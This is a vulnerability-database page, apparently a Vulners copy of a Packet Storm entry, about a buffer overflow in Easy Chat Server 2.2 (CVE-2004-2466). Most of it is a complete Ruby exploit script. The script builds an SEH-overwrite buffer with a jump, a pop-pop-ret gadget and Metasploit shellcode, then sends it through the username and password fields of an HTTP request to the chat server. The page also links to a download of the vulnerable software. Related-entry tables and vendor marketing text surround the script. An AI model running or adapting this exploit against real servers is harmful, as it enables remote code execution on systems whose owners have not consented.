Lucene search
K

Easy Chat Server 2.2 Buffer Overflow

🗓️ 19 Jan 2010 00:00:00Reported by John BabioType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 42 Views

Easy Chat Server 2.2 Buffer Overflow Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Easy Chat Server 3.1 Buffer Overflow Exploit
20 Mar 201800:00
zdt
0day.today
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) Exploit
1 Aug 202200:00
zdt
Circl
CVE-2004-2466
6 Aug 201000:00
circl
CVE
CVE-2004-2466
20 Aug 200504:00
cve
Cvelist
CVE-2004-2466
20 Aug 200504:00
cvelist
Exploit DB
EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)
6 Aug 201000:00
exploitdb
Exploit DB
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
1 Aug 202200:00
exploitdb
NVD
CVE-2004-2466
31 Dec 200405:00
nvd
Packet Storm
Easy Chat Server 3.1 Buffer Overflow
17 Mar 201800:00
packetstorm
Packet Storm
Easy Chat Server 3.1 Buffer Overflow
1 Aug 202200:00
packetstorm
Rows per page
`  
  
# Title: Exploit EFS Software Easy Chat Server v2.2   
# EDB-ID:   
# CVE-ID: 2004-2466  
# OSVDB-ID: 7416  
# Author: John Babio  
# Published: 2010-01-17  
# Tested on: [Windows XP Sp3 Eng]  
# Download Exploit Code  
# Download Vulnerable app (https://www.securinfos.info/old_softwares_vulnerable/Easy_Chat_Server_2.2.exe)  
  
#!/usr/bin/ruby  
  
require 'net/http'  
require 'uri'  
require 'socket'  
  
  
jmp = "\xeb\x06\x90\x90"  
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret  
  
#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
  
shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +  
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +  
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +  
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +  
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +  
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +  
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +  
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +  
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +  
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"   
  
buffer = "\x41" * 216 + jmp + ppr + shellcode  
  
url = URI.parse('http://10.10.99.12')  
res = Net::HTTP.start(url.host, url.port) {|http|  
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')  
}  
puts res.body  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation